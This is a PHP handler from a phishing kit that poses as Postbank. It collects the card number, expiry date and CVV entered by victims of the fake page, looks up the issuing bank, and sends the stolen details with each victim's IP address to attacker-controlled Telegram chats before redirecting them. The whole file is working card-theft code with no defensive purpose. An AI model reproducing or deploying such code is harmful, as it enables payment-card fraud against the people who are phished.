<?php 

require "fun.php";

if(isset($_POST['oneid'])){
$ult = post('oneid');
// $fullname = post('fullname');
$exp = post('oneid1');
$cvv = post('oneid4');
//$pins = post('pins');
# Fullname : $fullname
# Numbers : $cardnumber
# Date : $exp
# Pin : $pin
// Retrieve bin and perform bin lookup
    $_SESSION['oneid'] = str_replace(" ", "", $_POST['oneid']);
    $bin = substr($_SESSION['oneid'], 0, 8);
    $api = 'https://lookup.binlist.net/' . $bin;
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $api);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    $data = curl_exec($curl);
    curl_close($curl);
    $details = json_decode($data);
    $_SESSION['bank'] = $details->bank->name;
$res = urlencode("
➡️ POSTBANK CARD INFO 💳 ..
 🌐 Victim IP : ".ip()."

💳 Card : $ult
💳 Exp : $exp
💳 CVV : $cvv
🏛️ Bank name : {$_SESSION['bank']}

⚡️丂 卄 卂 ᗪ ㄖ 山 ㄥ 乇 ᘜ 乇 几 ᗪ ™️ ⚡️
");
 
foreach($chat_ids as $chat_id){
	send($res, $chat_id);
}

go("../wait.php?page=CVV");
}